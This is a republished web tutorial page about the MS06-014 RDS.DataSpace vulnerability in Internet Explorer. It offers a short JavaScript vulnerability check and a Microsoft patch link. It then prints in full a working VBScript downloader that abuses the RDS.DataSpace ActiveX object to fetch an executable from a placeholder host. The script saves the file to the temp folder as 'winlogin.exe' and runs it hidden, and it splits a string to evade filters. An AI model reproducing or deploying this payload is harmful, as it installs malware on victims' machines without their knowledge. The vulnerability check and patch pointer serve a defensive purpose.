Home > Web Front-end > JS Tutorial > [Latest Vulnerability] Using Rds.DataSpace to download and run virus files in IE_Hacker Nature

[Latest Vulnerability] Using Rds.DataSpace to download and run virus files in IE_Hacker Nature

WBOY
Release: 2016-05-16 19:18:45
Original
1228 people have browsed it

Please execute the following code to test whether your machine is vulnerable:


[Ctrl A Select all Note: If you need to introduce external Js, you need to refresh to execute
]
Patch download: http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx

The vbs code of the related virus is as follows: The code is as follows:


on error resume next
dl = "http://www.xxx.com/xxx.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="winlogin.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F .BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell. Application","")
Q.ShellExecute fname1,"","","open",0
<script> try { var Dts = new ActiveXObject("RDS.DataSpace"); var Stm = Dts.CreateObject("Microsoft.XmlHttp",""); alert("您的机器存在漏洞,请及时打上补丁。"); } catch(err) { alert("您的机器不存在该漏洞:" + err.message); } </script>
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template